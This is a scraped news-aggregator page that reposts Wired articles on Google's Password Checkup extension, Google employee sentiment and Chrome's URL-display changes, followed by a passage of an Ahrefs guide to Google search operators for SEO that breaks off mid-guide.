Hexbyte  Tech News  Wired A Google Chrome Extension Will Save You From Unsafe Passwords

Hexbyte Tech News Wired A Google Chrome Extension Will Save You From Unsafe Passwords

Hexbyte Tech News Wired

Data breaches that compromise people’s usernames and passwords have become so common, and used in crime for so long, that millions of stolen credential pairs have actually become practically worthless to criminals, circulating online for free. And that doesn’t even begin to scratch the surface of the more current credentials sold on the black market. All of this means that it’s increasingly difficult to keep track of which of your passwords you need to change. So Google has devised a Chrome extension to watch your back.

On Tuesday, the company is announcing “Password Checkup,” which runs in Chrome all the time as you go about your daily web browsing, and checks passwords you enter on all sites against a database of known compromised passwords. Password Checkup isn’t a password manager, a gauge of how weak or strong your passwords are, or a source of advice. It just sits quietly until it detects a credential pair that is known to be exposed, and then it shows a warning. That’s it.

The tool is unobtrusive by design, so you’ll actually pay attention to it when it notices genuine risks. If you’ve been feeling overwhelmed by all the news of data breaches and cybercrime over the past few years, Password Checkup is meant as an easy way to take back some control.

Watchdog

Google accounts tend to be particularly sensitive, because they are often the key to a person’s email address. So the company has already been grappling with notifying users when their Google credentials are compromised—not because Google was hacked but because people reuse passwords on multiple sites.

Google relies on a database of compromised credentials that totals about four billion unique usernames and passwords, gathered from troves its security teams access online as they go about their larger threat detection research for the company. Google says it hasn’t ever bought stolen credentials, and that it doesn’t currently collaborate with other security-minded aggregators like Have I Been Pwned, a service maintained by the security researcher Troy Hunt. The company does accept donations of stolen credentials from researchers, though.

The company has already uses that stash to force Google users to abandon exposed passwords. And other Google divisions, like Nest, are working on features to prevent exposed password reuse, because of problems with account takeovers.

“We’ve reset something like 110 million passwords on Google accounts because of massive breaches and other data exposures,” says Elie Bursztein, who leads the anti-abuse research team at Google. “The idea is, can we have a way to do it everywhere? It works in the background and then after 10 seconds you may get a warning that says ‘hey, this is part of a data breach, you should consider changing your password’. We want it to be 100 percent if we show it to you you have to change it.”

Google’s database is always growing, but appears to have some holes. When I tested Password Checkup with a login that I know has been compromised in breaches (so I have one account I haven’t updated yet, what are you gonna do) it didn’t flag it.

Bursztein and Kurt Thomas, a Google security and anti-abuse research scientist note that they’ve skewed toward zero false positives so they aren’t accidentally giving users warnings based on similar, but slightly different passwords or the same password that was compromised for a different person, but not you. And they emphasize that while the company is releasing Password Checkup as a regular Chrome extension for people to start using, it’s still an experiment and isn’t necessarily finalized.

Check Mate

The researchers are anticipating controversy—or “a conversation” as they often call it— about a crucial question that you may have by now, too: If Password Checkup is running quietly on Chrome all the time with the express goal of monitoring your login credentials, isn’t Google going to end up with a terrifying trove of all your passwords? And if so, couldn’t attackers find a way to compromise Password Checkup to grab tons of current credentials, track you, or infiltrate Google’s database of stolen data?

“There are four threats we had to think about when designing the system,” Thomas says. “The first is that Google never learns your username and password in the process. Another one is we don’t want to tell you about anyone else’s usernames and passwords that don’t belong to you. And we need to prevent somebody from brute forcing the system. We don’t want you to start guessing random usernames and passwords. And the last is we don’t want any sort of trackable identifier for the user that would reveal any information.”

It wouldn’t be feasible on multiple levels for Google to check the credentials without any data leaving the user’s device at all. Instead, the company collaborated with cryptographers at Stanford University to devise layers of encryption and hashing—protective data scrambling—that combine to protect the data as it traverses the internet. First of all, the entire database is scrambled with a hashing function called Argon 2, a robust, well-regarded scheme, as a deterrent against an attacker compromising the database or attempting to pull credentials out of the Chrome extension.

Rather than have you download the entire database, the researchers devised a scheme for downloading a smaller subset, or partition, of the data without revealing too much about your specific username and password. When you log into a site, Password Checkup generates a hash of your username and password on your device, and then sends a snippet of it to Google. The system then uses this prefix to create the smaller subset of breached username and password data to download onto your device. “This provides a strong anonymity set where there’s basically hundreds of thousands of usernames and passwords that would fall into that prefix, but we have no idea which they are,” Thomas says. “When you sign in you send that little prefix to Google and we give you every account that we know to download.”

To index into your subset of the database, your device signs your encrypted username and password with a key only it knows and sends it to Google. Next the company signs it with its own secret key, then sends it back to your device, which decrypts it with its key. After this handshake is complete, the data is finally in the right state of encryption and hashing to do a compatible local lookup on your device against the portion of the database you’ve downloaded. The idea is that everything is encrypted all the time to make the data as indecipherable and useless to a potential attacker—or Google itself—as possible at every phase.

Details Matter

Google plans to release an academic paper about the tool with Stanford researchers that details its underlying protocols and cryptographic principles for public vetting.

When asked about the idea of a browser extension that attempts to monitor passwords in a cryptographically secure and private way, Johns Hopkins cryptographer Matthew Green said, “It’s possible. It could be done securely, I think. I think. But details matter.” Green notes that such a scheme would need to be executed essentially perfectly and would have a number of crucial areas where it could fall short. “If a lot of people will be using it—it’s a little scary, frankly,” he says. And in general, you should only install browser extensions from companies you trust.

With such a desperate need for easily understandable breach information and advice, a lot of people very easily could start using Password Checkup quickly. So it will be incumbent upon Google to actually continue improving the extension’s security based on community feedback—both from users and cryptographers.


More Great WIRED Stories

Read More

Hexbyte  Tech News  Wired Google Employees Report Declining Confidence in Leaders

Hexbyte Tech News Wired Google Employees Report Declining Confidence in Leaders

Hexbyte Tech News Wired

Hexbyte  Tech News  Wired

Despite an 18-point drop in confidence in Google leadership, employees generally praised CEO Sundar Pichai’s response to a 2016 memo outlining potential cuts in compensation.

Mateusz Wlodarczyk/Getty Images

Google is a data-obsessed company, but the recent cascade of employee activism can be hard to quantify. How do you take the temperature of a 90,000-person workforce? In November, employees gave Google’s senior leadership an undeniable signal when 20,000 workers walked out of their offices to protest sexual harassment policies. The results of Google’s latest annual survey on employee satisfaction, which were shared internally in January, offer another sign.

Asked whether they have confidence in CEO Sundar Pichai and his management team to “effectively lead in the future,” 74 percent of employees responded “positive,” as opposed to “neutral” or “negative,” in late 2018, down from 92 percent “positive” the year before. The 18-point drop left employee confidence at its lowest point in at least six years. The results of the survey, known internally as Googlegeist, also showed a decline in employees’ satisfaction with their compensation, with 54 percent saying they were satisfied, compared with 64 percent the prior year.

The drop in employee sentiment helps explain why internal debate around compensation, pay equity, and trust in executives has heated up in recent weeks—and why an HR presentation from 2016 went viral inside the company three years later.

The presentation, first reported by Bloomberg and reviewed by WIRED, dates from July 2016, about a year after Google started an internal effort to curb spending. In the slide deck, Google’s human-resources department presents potential ways to cut the company’s $20 billion compensation budget. Ideas include: promoting fewer people, hiring proportionately more low-level employees, and conducting an audit to make sure Google is paying benefits “(only) for the right people.” In some cases, HR suggested ways to implement changes while drawing little attention, or tips on how to sell the changes to Google employees. Some of the suggestions were implemented, like eliminating the annual employee holiday gift; most were not.

Another, more radical proposal floated inside the company around the same time didn’t appear in the deck. That suggested converting some full-time employees to contractors to save money. A person familiar with the situation said this proposal was not implemented. In July, Bloomberg reported that, for the first time, more than 50 percent of Google’s workforce were temps, contractors, and vendors.

The slide deck also includes suggestions for how Google might reinvest some of the savings from these cost cuts, including creating a stand-alone university building in the Bay Area called Google University, hiring more women and minorities, and giving new parents globally 16 weeks parental leave.

A Controversial Company-Wide Meeting

The 2016 presentation, which began circulating inside Google in mid-January, might not have made such an impact with workers if not for executive comments at a company-wide meeting a few days earlier that some employees considered tone-deaf. The meeting was to discuss the Googlegeist results, where managers attempted to put a positive spin on the decline in confidence. Prasad Setty, Google’s vice president of people operations, told the room that dissatisfaction around compensation came from employees who didn’t get promoted and don’t understand how compensation at Google works, according to people familiar with the matter.

The meeting sparked angry commentary about executives on Google’s internal message board for memes, according to employees. Some workers found management’s approach patronizing. One Google employee was frustrated with management’s evasiveness, but wondered if the employee backlash stemmed from the fact that executives were trying to explain individual compensation practices, when activist employees wanted answers to demands for pay equity for contractors, women, and others, first raised during the November walkout.

Once they saw the 2016 memo, employees zeroed in on the suggestion to reduce the number of people promoted by 2 percent—which meant that some qualified people might miss out on promotions because of a cost-cutting strategy they knew nothing about. “They have a deliberate and intentional, well-crafted narrative that they consistently rely on to continue taking advantage of people,” says a Google employee who requested anonymity. “The big lie is that the grueling interview process, performance review process, conversion process—that all of these things exist because we have a meritocratic system of rewards and the bar for excellence is really high.”

At another company-wide meeting a few days later to discuss compensation, Pichai and Setty sought to apologize for the memo and take a more candid approach with employees. Pichai said the document had never crossed his desk and that, if it had, he would have rejected the suggestion about promotions. Following the meeting, employees thanked Pichai for appearing and praised his candor on the internal meme message board.

High Pay, but New Questions

Google is consistently ranked as the best place to work in America. Median pay is $197,000, according to the most recent SEC filings; among the tech giants, only Facebook has a higher median pay. But recent media reports have given employees more information about how Google’s vast resources are allocated. A gender bias lawsuit filed in 2017 claims Google assigned new female hires to lower levels and denied them promotions.The November walkout was prompted by a New York Times report that Android founder Andy Rubin received a $90 million exit package, even after a sexual harassment complaint the company found credible.

The disclosure about contractors also rankled. Popular perception, even within Google, is that contractors are hired for service or nontechnical roles. But inside Alphabet, Google’s parent company, contractors work as engineers, recruiters, and even manage teams, Bloomberg reported. Anna, a contractor in Mountain View who requested to use only her first name, told WIRED that she doesn’t fit the image Google would like to project. She acts as a liaison between Google and outside vendors and says she is “paid really well.” Still, she does not have access to health care benefits or time off and she can’t attend parties for launches that she helped prepare. Perry, who conducted user research for Google in Seattle until his contract ended last week, said that managers may not know how much money contract workers are taking home.

Some of Google’s well-paid staffers, including organizers of the Google walkout, have been trying to draw more attention to practices they find exploitative, especially for a company that posted $21.8 billion in profit in the first nine months of last year. Their concerns echo the larger political movement around inequality, which has focused on tech titans and how their business practices have concentrated wealth in the hands of a few, even within their own companies.

The secrecy around compensation at Google has been a flashpoint before. In 2015, Erica Joy Baker, then an engineer at Google, started a spreadsheet for employees to share their salaries, as a way to combat the “chilling effect” that comes from discouraging employees to talk about their pay. Since the latest survey results were announced, employees have been adding their salaries to Baker’s spreadsheet, which is still active; meanwhile, contractors have been sharing their benefits and pay to compare agency practices.

Despite the overall good reviews, Pichai disappointed some employees with his answers on contractors. Asked why Google has contractors struggling to live in the Bay Area while he himself makes hundreds of millions, Pichai said it was a cost of living issue beyond Google’s control.

“They could totally afford to pay people a living wage,” Stephanie Parker, who works in policy at YouTube, told WIRED. “They’ve said multiple times, ‘We’re leading the market, what we do other companies follow.’ OK, then pay your people. Other companies will follow.”


More Great WIRED Stories

Read More

Hexbyte  Tech News  Wired Google Takes Its First Steps Toward Killing the URL

Hexbyte Tech News Wired Google Takes Its First Steps Toward Killing the URL

Hexbyte Tech News Wired

In September, members of Google’s Chrome security team put forth a radical proposal: Kill off URLs as we know them. The researchers aren’t actually advocating a change to the web’s underlying infrastructure. They do, though, want to rework how browsers convey what website you’re looking at, so that you don’t have to contend with increasingly long and unintelligible URLs—and the fraud that has sprung up around them. In a talk at the Bay Area Enigma security conference on Tuesday, Chrome usable security lead Emily Stark is wading into the controversy, detailing Google’s first steps toward more robust website identity.

Stark emphasizes that Google isn’t trying to induce chaos by eliminating URLs. Rather, it wants to make it harder for hackers to capitalize on user confusion about the identity of a website. Currently, the endless haze of complicated URLs gives attackers cover for effective scams. They can create a malicious link that seems to lead to a legitimate site, but actually automatically redirects victims to a phishing page. Or they can design malicious pages with URLs that look similar to real ones, hoping victims won’t notice that they’re on G00gle rather than Google. With so many URL shenanigans to combat, the Chrome team is already at work on two projects aimed at bringing users some clarity.

“What we’re really talking about is changing the way site identity is presented,” Stark told WIRED. “People should know easily what site they’re on, and they shouldn’t be confused into thinking they’re on another site. It shouldn’t take advanced knowledge of how the internet works to figure that out.”

“A key challenge is avoiding flagging legitimate domains as suspicious.”

Emily Stark, Google Chrome

The Chrome team’s efforts so far focus on figuring out how to detect and warn users about URLs that seem to deviate in some way from standard practice. The foundation for this is an open source tool called TrickURI, launching in step with Stark’s conference talk, that collects both legitimate and sneaky URL samples to train machine learning algorithms about potentially phishy sites. The goal is to give developers—particularly browser developers—something to test against if they want to start adding suspicious URL detection and warning mechanisms into their software. Building on that foundation, Stark and her colleagues are also working to create warnings for Chrome users, and testing them with TrickURI.

For Google users, the first line of defense against phishing and other online scams is still the company’s Safe Browsing platform. But the Chrome team is exploring complements to Safe Browsing that specifically focus on flagging sketchy URLs.

Google

“Our heuristics for detecting misleading URLs involve comparing characters that look similar to each other and domains that vary from each other just by a small number of characters,” Stark says. “Our goal is to develop a set of heuristics that pushes attackers away from extremely misleading URLs, and a key challenge is avoiding flagging legitimate domains as suspicious. This is why we’re launching this warning slowly, as an experiment.”

Google says it hasn’t started rolling out the warnings to the general user population while the Chrome team refines those detection capabilities. And while URLs may not be going anywhere anytime soon, Stark emphasizes that there is more in the works on how to get users to focus on important parts of URLs and to refine how Chrome presents them. The big challenge is showing people the parts of URLs that are relevant to their security and online decision-making, while somehow filtering out all the extra components that make URLs hard to read. Browsers also sometimes need to help users with the opposite problem, by expanding shortened or truncated URLs.

“The whole space is really challenging because URLs work really well for certain people and use cases right now, and lots of people love them,” Stark says. “We’re excited about the progress that we’ve made with our new open source URL display ‘TrickURI’ tool and our exploratory new warnings on confusable URLs.”

The Chrome security team has taken on internet-wide security issues before, developing fixes for them in Chrome and then throwing Google’s weight around to motivate everyone to adopt the practice. The strategy was particularly successful over the last five years in stimulating a movement toward universal adoption of HTTPS web encryption. But critics of the approach fear the drawbacks of Chrome’s power and ubiquity. The same influence that has been used for positive change could be misdirected or abused. And with something as foundational as URLs, critics fear that the Chrome team could land on website identity display tactics that are good for Chrome, but don’t actually benefit the rest of the web. Even seemingly minor changes to Chrome’s privacy and security posture can have major impacts on the web community.

Additionally, a tradeoff of that ubiquity is being beholden to risk-averse corporate customers. “URLs as they work now are often unable to convey a risk level users can quickly identify,” says Katie Moussouris, founder of the responsible vulnerability disclosure firm Luta Security. “But as Chrome grows in enterprise adoption, rather than the consumer space, their ability to radically change visible interfaces and underlying security architecture will be reduced by the pressure of their customers. Great popularity comes not only with great responsibility to keep people safe, but to minimize churn in features, usability, and backwards compatibility.”

If it all sounds like a lot of confusing and frustrating work, that’s exactly the point. The next question will be how the Chrome team’s new ideas perform in practice, and whether they really wind up making you safer on the web.


More Great WIRED Stories

Read More

Hexbyte  Hacker News  Computers Google Search Operators: The Complete List (42 Advanced Operators)

Hexbyte Hacker News Computers Google Search Operators: The Complete List (42 Advanced Operators)

Hexbyte Hacker News Computers

For anyone that’s been doing SEO for a while, Google advanced search operators—i.e., special commands that make regular ol’ searches seem laughably basic in comparison—are nothing new.

Here’s a Google search operator you may be familiar with.

Hexbyte  Hacker News  Computers ahrefs site search

the “site:” operator restricts results to only those from a specified site.

It’s easy to remember most search operators. They’re short commands that stick in the mind.

But knowing how to use them effectively is an altogether different story.

Most SEOs know the basics, but few have truly mastered them.

In this post, I’ll share 15 actionable tips to help you master search operators for SEO, which are:

  1. Find indexation errors
  2. Find non‐secure pages (non‐https)
  3. Find duplicate content issues
  4. Find unwanted files and pages on your site
  5. Find guest post opportunities
  6. Find resource page opportunities
  7. Find sites that feature infographics… so you can pitch YOURS
  8. Find more link prospects… AND check how relevant they are
  9. Find social profiles for outreach prospects
  10. Find internal linking opportunities
  11. Find PR opportunities by finding competitor mentions
  12. Find sponsored post opportunities
  13. Find Q+A threads related to your content
  14. Find how often your competitors are publishing new content
  15. Find sites linking to competitors

But first, here’s a complete list of all Google search operators and their functionality.

Hexbyte Hacker News Computers Google Search Operators: The Complete List

Did you know that Google is constantly killing useful operators?

That’s why most existing lists of Google search operators are outdated and inaccurate.

For this post, I personally tested EVERY search operator I could find.

Here is a complete list of all working, non‐working, and “hit and miss” Google advanced search operators as of 2018.

Hexbyte  Hacker News  Computers

search term”

Force an exact‐match search. Use this to refine results for ambiguous searches, or to exclude synonyms when searching for single words.

Example: “steve jobs”

OR

Search for X or Y. This will return results related to X or Y, or both. Note: The pipe (|) operator can also be used in place of “OR.”

Examples: jobs OR gates / jobs | gates

AND

Search for X and Y. This will return only results related to both X and Y. Note: It doesn’t really make much difference for regular searches, as Google defaults to “AND” anyway. But it’s very useful when paired with other operators.

Example: jobs AND gates

Exclude a term or phrase. In our example, any pages returned will be related to jobs but not Apple (the company).

Example: jobs -apple

*

Acts as a wildcard and will match any word or phrase.

Example: steve * apple 

( )

Group multiple terms or search operators to control how the search is executed.

Example: (ipad OR iphone) apple

$

Search for prices. Also works for Euro (€), but not GBP (£) 🙁

Example: ipad $329

define:

A dictionary built into Google, basically. This will display the meaning of a word in a card‐like result in the SERPs.

Example: define:entrepreneur

cache:

Returns the most recent cached version of a web page (providing the page is indexed, of course).

Example: cache:apple.com

filetype:

Restrict results to those of a certain filetype. E.g., PDF, DOCX, TXT, PPT, etc. Note: The “ext:” operator can also be used—the results are identical.

Example: apple filetype:pdf / apple ext:pdf

site:

Limit results to those from a specific website.

Example: site:apple.com

related:

Find sites related to a given domain.

Example: related:apple.com

intitle:

Find pages with a certain word (or words) in the title. In our example, any results containing the word “apple” in the title tag will be returned.

Example: intitle:apple

allintitle:

Similar to “intitle,” but only results containing all of the specified words in the title tag will be returned.

Example: allintitle:apple iphone

inurl:

Find pages with a certain word (or words) in the URL. For this example, any results containing the word “apple” in the URL will be returned.

Example: inurl:apple

allinurl:

Similar to “inurl,” but only results containing all of the specified words in the URL will be returned.

Example: allinurl:apple iphone

intext:

Find pages containing a certain word (or words) somewhere in the content. For this example, any results containing the word “apple” in the page content will be returned.

Example: intext:apple

allintext:

Similar to “intext,” but only results containing all of the specified words somewhere on the page will be returned.

Example: allintext:apple iphone

AROUND(X)

Proximity search. Find pages containing two words or phrases within X words of each other. For this example, the words “apple” and “iphone” must be present in the content and no further than four words apart.

Example: apple AROUND(4) iphone

weather:

Find the weather for a specific location. This is displayed in a weather snippet, but it also returns results from other “weather” websites.

Example: weather:san francisco

stocks:

See stock information (i.e., price, etc.) for a specific ticker.

Example: stocks:aapl

map:

Force Google to show map results for a locational search.

Example: map:silicon valley

movie:

Find information about a specific movie. Also finds movie showtimes if the movie is currently showing near you.

Example: movie:steve jobs

in

Convert one unit to another. Works with currencies, weights, temperatures, etc.

Example: $329 in GBP

source:

Find news results from a certain source in Google News.

Example: apple source:the_verge

_

Not exactly a search operator, but acts as a wildcard for Google Autocomplete.

Example: apple CEO _ jobs

Hexbyte  Hacker News  Computers

Here are the ones that are hit and miss, according to my testing:

#..#

Search for a range of numbers. In the example below, searches related to “WWDC videos” are returned for the years 2010–2014, but not for 2015 and beyond.

Example: wwdc video 2010..2014

inanchor:

Find pages that are being linked to with specific anchor text. For this example, any results with inbound links containing either “apple” or “iphone” in the anchor text will be returned.

Example: inanchor:apple iphone

allinanchor:

Similar to “inanchor,” but only results containing all of the specified words in the inbound anchor text will be returned.

Example: allinanchor:apple iphone

blogurl:

Find blog URLs under a specific domain. This was used in Google blog search, but I’ve found it does return some results in regular search.

Example: blogurl:microsoft.com

Sidenote.

Google blog search discontinued in 2011

loc:placename

Find results from a given area.

Example: loc:”san francisco” apple

Sidenote.

Not officially deprecated, but results are inconsistent.

location:

Find news from a certain location in Google News.

Example: loc:”san francisco” apple

Sidenote.

Not officially deprecated, but results are inconsistent.

Hexbyte  Hacker News  Computers

Here are the Google search operators that have been discontinued and no longer work. 🙁

+

Force an exact‐match search on a single word or phrase.

Example: jobs +apple

Sidenote.

You can do the same thing by using double quotes around your search.

~

Include synonyms. Doesn’t work, because Google now includes synonyms by default. (Hint: Use double quotes to exclude synonyms.)

Example: ~apple

inpostauthor:

Find blog posts written by a specific author. This only worked in Google Blog search, not regular Google search.

Example: inpostauthor:”steve jobs”

Sidenote.

Google blog search was discontinued in 2011.

allinpostauthor:

Similar to “inpostauthor,” but removes the need for quotes (if you want to search for a specific author, including surname.)

Example: allinpostauthor:steve jobs

inposttitle:

Find blog posts with specific words in the title. No longer works, as this operator was unique to the discontinued Google blog search.

Example: intitle:apple iphone

link:

Find pages linking to a specific domain or URL. Google killed this operator in 2017, but it does still show some results—they likely aren’t particularly accurate though. (Deprecated in 2017)

Example: link:apple.com

info:

Find information about a specific page, including the most recent cache, similar pages, etc. (Deprecated in 2017). Note: The id: operator can also be used—the results are identical.

Sidenote.

Although the original functionality of this operator is deprecated, it is still useful for finding the canonical, indexed version of a

URL

. Thanks to

@glenngabe

for pointing this one one!

Example: info:apple.com / id:apple.com

daterange:

Find results from a certain date range. Uses the Julian date format, for some reason.

Example: daterange:11278–13278

Sidenote.

Not officially deprecated, but doesn’t seem to work.

phonebook:

Find someone’s phone number. (Deprecated in 2010)

Example: phonebook:tim cook

#

Searches #hashtags. Introduced for Google+; now deprecated.

Example: #apple

Hexbyte Hacker News Computers 15 Actionable Ways to Use Google Search Operators

Now let’s tackle a few ways to put these operators into action.

My aim here is to show that you can achieve almost anything with Google advanced operators if you know how to use and combine them efficiently.

So don’t be afraid to play around and deviate from the examples below. You might just discover something new.

Let’s go!

1. Find indexation errors

Google indexation errors exist for most sites.

It could be that a page that should be indexed, isn’t. Or vice‐versa.

Let’s use the site: operator to see how many pages Google has indexed for ahrefs.com.

Hexbyte  Hacker News  Computers ahrefs site operator index

~1,040.

But how many of these pages are blog posts?

Let’s find out.

Hexbyte  Hacker News  Computers ahrefs blog posts index

~249. That’s roughly ¼.

I know Ahrefs blog inside out, so I know this is higher than the number of posts we have.

Let’s investigate further.

Hexbyte  Hacker News  Computers ahrefs blog weird indexation

OK, so it seems that a few odd pages are being indexed.

(This page isn’t even live—it’s a 404)

Such pages should be removed from the SERPs by noindexing them.

Let’s also narrow the search to subdomains and see what we find.

Hexbyte  Hacker News  Computers ahrefs index subdomains

Sidenote.

Here, we’re using the wildcard (*) operator to find all subdomains belonging to the domain, combined with the exclusion operator (-) to exclude regular www results.

~731 results.

Here’s a page residing on a subdomain that definitely shouldn’t be indexed. It gives a 404 error for a start.

Hexbyte  Hacker News  Computers ahrefs indexation error

Here are a few other ways to uncover indexation errors with Google operators:

  • site:yourblog.com/category — find WordPress blog category pages;
  • site:yourblog.com inurl:tag — find WordPress “tag” pages.

2. Find non‐secure pages (non‐https)

HTTPs is a must these days, especially for ecommerce sites.

But did you know that you can find unsecure pages with the site: operator?

Let’s try it for asos.com.

Hexbyte  Hacker News  Computers asos unsecure 1

Oh my, ~2.47M unsecure pages.

It looks like ASAS don’t currently use SSL—unbelievable for such a large site.

Hexbyte  Hacker News  Computers asos unsecure

Sidenote.

Don’t worry, Asos customers—their checkout pages are secure 🙂

But here’s another crazy thing:

ASOS is accessible at both the https and http versions.

Hexbyte  Hacker News  Computers asos http https

And we learned all that from a simple site: search!

Sidenote.

I’ve noticed that sometimes, when using this tactic, pages will be indexed without the https. But when you click‐through, you will be directed to the https version. So don’t assume that your pages are unsecure just because they appear as such in Google’s index. Always click a few of them to double‐check.

3. Find duplicate content issues

Duplicate content = bad.

Here’s a pair of Abercrombie and Fitch jeans from ASOS with this brand description:

Hexbyte  Hacker News  Computers asos abercrombie and fitch

With third‐party brand descriptions like this, they’re often duplicated on other sites.

But first, I’m wondering how many times this copy appears on asos.com.

Hexbyte  Hacker News  Computers abercrombie and fitch ahrefs duplicate same domain

~4.2K.

Now I’m wondering if this copy is even unique to ASOS.

Let’s check.

Hexbyte  Hacker News  Computers abercrombie and fitch asos duplicate

No, it isn’t.

That’s 15 other sites with this exact same copy—i.e., duplicate content.

Sometimes duplicate content issues can arise from similar product pages, too.

For example, similar or identical products with different quantity counts.

Here’s an example from ASOS:

Hexbyte  Hacker News  Computers asos socks quantities duplicate

You can see that—quantities aside—all of these product pages are the same.

But duplicate content isn’t only a problem for ecommerce sites.

If you have a blog, then people could be stealing and republishing your content without attribution.

Let’s see if anyone has stolen and republished our list of SEO tips.

Hexbyte  Hacker News  Computers seo tips stolen content

~17 results.

Sidenote.

You’ll notice that I excluded

ahrefs.com

 from the results using the exclusion (-) operator—this ensures that the original doesn’t appear in the search results. I also excluded the word “pinterest.” This was because I saw a lot of Pinterest results for this search, which aren’t really relevant to what we’re looking for. I could have excluded just pinterest.com (-pinterest.com), but as Pinterest has many ccTLDs, this didn’t really help things. Excluding the word “pinterest” was the best way to clean up the results.

Most of these are probably syndicated content.

Still, it’s worth checking these out to make sure that they do link back to you.

Find stolen content in seconds

Content Explorer > In title > enter the title of your page/post > exclude your own site

Hexbyte  Hacker News  Computers content explorer syndication search

You will then see any pages (from our database of 900M+ pieces of content) with the same title as your page/post.

In this instance, there are 5 results.

Hexbyte  Hacker News  Computers 5 results content explorer

Next, enter your domain under “Highlight unlinked domains.”

This will highlight any sites that don’t link back to you.

Hexbyte  Hacker News  Computers highlight unlinked domains

You can then reach out to those sites and request the addition of a source link.

FYI, this filter actually looks for links on a domain‐level rather than a page‐level. It is, therefore, possible that the site could be linking to you from another page, rather than the page in question.

4. Find odd files on your domain (that you may have forgotten about)

Keeping track of everything on your website can be difficult.

(This is especially true for big sites.)

For this reason, it’s easy to forget about old files you may have uploaded.

PDF files; Word documents; Powerpoint presentations; text files; etc.

Let’s use the filetype: operator to check for these on ahrefs.com.

Hexbyte  Hacker News  Computers filetype operator pdf

Sidenote.

Remember, you can also use the

ext:

 operator—it does the same thing.

Here’s one of those files:

Hexbyte  Hacker News  Computers ahrefs pdf file in index

I’ve never seen that piece of content before. Have you?

But we can extend this further than just PDF files.

By combining a few operators, it’s possible to return results for all supported file types at once.

Hexbyte  Hacker News  Computers filetype operator all types

Sidenote.

The filetype operator does also support things like

.asp

,

.php

,

.html

, etc.

It’s important to delete or noindex these if you’d prefer people didn’t come across them.

5. Find guest post opportunities

Guest post opportunities… there are TONS of ways to find them, such as:

Hexbyte  Hacker News  Computers guest post operator write for us

But you already knew about that method, right!? 😉

Sidenote.

For those who haven’t seen this one before, it uncovers so‐called “write for us” pages in your niche—the pages many sites create when they’re actively seeking guest contributions.

So let’s get more creative.

First off: don’t limit yourself to “write for us.”

You can also use:

  • “become a contributor"
  • “contribute to”
  • “write for me” (yep—there are solo bloggers seeking guest posts, too!)
  • “guest post guidelines”
  • inurl:guest-post
  • inurl:guest-contributor-guidelines
  • etc.

But here’s a cool tip most people miss:

You can search for many of these at once.

Hexbyte  Hacker News  Computers guest post multi search operator

Sidenote.

Did you notice I’m using the pipe (“|”) operator instead of “

OR

” this time? Remember, it does the same thing. 🙂

You can even search for multiple footprints AND multiple keywords.

Hexbyte  Hacker News  Computers guestpost operator multiple footprints and keywords

Looking for opportunities in a specific country?

Just add a site:.tld operator.

Hexbyte  Hacker News  Computers guest post operators cctld

Here’s another method:

If you know of a serial guest blogger in your niche, try this:

Hexbyte  Hacker News  Computers ryan stewart intext inurl author

This will find every site that person has written for.

Sidenote.

Don’t forget to exclude their site to keep the results clean!

How to find even more author guest posts

Content Explorer > author search > exclude their site(s)

For this example, let’s use our very own Tim Soulo.

Hexbyte  Hacker News  Computers guest post author content explorer

BOOM. 17 results. All of which are probably guest posts.

For reference, here’s the exact search I entered into Content Explorer:

author:”tim soulo” -site:ahrefs.com -site:bloggerjet.com

Basically, this searches for posts by Tim Soulo. But it also excludes posts from ahrefs.com and bloggerjet.com (Tim’s personal blog).

Note. Sometimes you will find a few false positives in there. It depends on how common the persons name happens to be.

But don’t stop there:

You can also use Content Explorer to find sites in your niche that have never linked to you.

Content Explorer > enter a topic > one article per domain > highlight unlinked domains

Here’s one of the unlinked domains I found for ahrefs.com:

Hexbyte  Hacker News  Computers unlinked domains

This means marketingprofs.com has never linked to us.

Now, this search doesn’t tell us whether or not they have a “write for us” page. But it doesn’t really matter. The truth is that most sites are usually happy to accept guest posts if you can offer them “quality” content. It would, therefore, definitely be worth reaching out and “pitching” such sites.

Another benefit of using Content Explorer is that you can see stats for each page, including:

  • # of RDs;
  • DR;
  • Organic traffic estimation;
  • Social shares;
  • Etc.

You can also export the results easily. 🙂

Finally, if you’re wondering whether a specific site accepts guest posts or not, try this:

Hexbyte  Hacker News  Computers specific site guest contribution

Sidenote.

You could add even more searches—e.g., “this is a guest article”—to the list of searches included within the parentheses. I kept this simple for demonstration purposes.

6. Find resource page opportunities

Resource” pages round‐up the best resources on a topic.

Here’s what a so‐called “resource” page looks like:

Hexbyte  Hacker News  Computers

All of those links you see = links to resources on other sites.

(Ironically—given the subject nature of that particular page—a lot of those links are broken)

So if you have a cool resource on your site, you can:

  1. find relevant “resource” pages;
  2. pitch your resource for inclusion

Here’s one way to find them:

Hexbyte  Hacker News  Computers fitness resources operator

But that can return a lot of junk.

Here’s a cool way to narrow it down:

Hexbyte  Hacker News  Computers fitness resources url title operator

Or narrow it down even further with:

Hexbyte  Hacker News  Computers intitle fitness numbers resources operator

Sidenote.

Using

allintitle:

here ensures that the title tag contains the words “fitness”

AND

“resources,” and also a number between 5–15.

a note about the #..# operator

I know what you’re thinking:

Why not use the #..# operator instead of that long sequence of numbers.

Good point!

Let’s try it:

Hexbyte  Hacker News  Computers fail operator

Confused? Here’s the deal:

This operator doesn’t play nicely with most other operators.

Nor does it seem to work a lot of the time anyway—it’s definitely hit and miss.

So I recommend using a sequence of numbers separated by “OR” or the pipe (“|”) operator.

It’s a bit of a hassle, but it works.

7. Find sites that feature infographics… so you can pitch YOURS

Infographics get a bad rap.

Most likely, this is because a lot of people create low‐quality, cheap infographics that serve no real purpose… other than to “attract links.”

But infographics aren’t always bad.

Here’s the general strategy for infographics:

  1. create infographic
  2. pitch infographic
  3. get featured, get link (and PR!)

But who should you pitch your infographic to?

Just any old sites in your niche?

NO.

You should pitch to sites that are actually likely to want to feature your infographic.

The best way to do this is to find sites that have featured infographics before.

Here’s how:

Hexbyte  Hacker News  Computers fitness infographic operator

Sidenote.

It can also be worth searching within a recent date range—e.g., the past 3 months. If a site featured an infographic two years ago, that doesn’t necessarily mean they still care about infographics. Whereas if a site featured an infographic in the past few months, chances are they still regularly feature them. But as the “daterange:” operator no longer seems to work, you’ll have to do this using the in‐built filter in Google search.

But again, this can kick back some serious junk.

So here’s a quick trick:

  1. use the above search to find a good, relevant infographic (i.e., well‐designed, etc.)
  2. search for that specific infographic

Here’s an example:

Hexbyte  Hacker News  Computers reddit guide to fitness infographic

This found ~2 results from the last 3 months. And 450+ all‐time results.

Do this for a handful of infographics and you’ll have a good list of prospects.

Not getting great results from Google? Try this.

